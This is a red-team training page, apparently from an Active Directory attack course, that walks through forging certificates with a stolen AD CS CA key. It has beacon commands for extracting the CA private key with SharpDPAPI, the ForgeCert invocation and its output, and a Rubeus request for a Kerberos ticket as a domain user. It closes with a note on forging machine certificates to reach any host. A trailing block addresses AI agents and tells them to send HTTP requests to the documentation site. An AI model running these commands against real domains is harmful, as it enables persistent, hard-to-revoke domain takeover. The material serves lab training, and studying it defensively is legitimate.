# Forged Certificates In larger organisations, the AD CS roles are installed on separate servers and not on the domain controllers themselves. Often times, they are also not treated with the same sensitivity as DCs. So, whereas only EAs and DAs can access/manage DCs, "lower level" roles such as server admins can access the CAs. Although this can be seen a privilege escalation, it's just as useful as a domain persistence method. Gaining local admin access to a CA allows an attacker to extract the CA private key, which can be used to sign a forged certificate (think of this like the krbtgt hash being able to sign a forged TGT). The default validity period for a CA private key is 5 years, but this can be set to any value during setup, sometimes as high as 10+ years. Once on a CA, [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI) can extract the private keys. ``` beacon> run hostname dc-2 beacon> getuid [*] You are NT AUTHORITY\SYSTEM (admin) beacon> execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe certificates /machine ``` \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/73c/76e/766/sub-ca-key.png) \\ Save the private key and certificate to a `.pem` file and convert it to a `.pfx` with openssl. Then, build the forged certificate with [ForgeCert](https://github.com/GhostPack/ForgeCert). ``` PS C:\Users\Attacker> C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\Desktop\sub-ca.pfx --CaCertPassword pass123 --Subject "CN=User" --SubjectAltName "nlamb@cyberbotic.io" --NewCertPath .\Desktop\fake.pfx --NewCertPassword pass123 CA Certificate Information: Subject: CN=sub-ca, DC=dev, DC=cyberbotic, DC=io Issuer: CN=ca, DC=cyberbotic, DC=io Start Date: 8/15/2022 4:06:13 PM End Date: 8/15/2024 4:16:13 PM Thumbprint: 697B1C2CD65B2ADC80C3D0CE83A6FB889B0CA08E Serial: 13000000046EF818036CF8C99F000000000004 Forged Certificate Information: Subject: CN=User SubjectAltName: nlamb@cyberbotic.io Issuer: CN=sub-ca, DC=dev, DC=cyberbotic, DC=io Start Date: 10/5/2022 1:24:23 PM End Date: 10/5/2023 1:24:23 PM Thumbprint: 0CF404F5D1534854BA5EDEC5953ED7B7BE96C3A8 Serial: 00978D5E506AE605589E43F21D17E56671 Done. Saved forged certificate to .\Desktop\fake.pfx with the password 'pass123' ``` \\ Even though you can specify any SubjectAltName, the user does need to be present in AD. We can now use Rubeus to request a legitimate TGT with this forged certificate. ``` beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /domain:dev.cyberbotic.io /enctype:aes256 /certificate:MIACAQ[...snip...]IEAAAA /password:pass123 /nowrap ``` \\ We're not limited to forging user certificates; we can do the same for machines. Combine this with the S4U2self trick to gain access to any machine or service in the domain. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://yamortsa.gitbook.io/rto/domain-dominance/forged-certificates.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.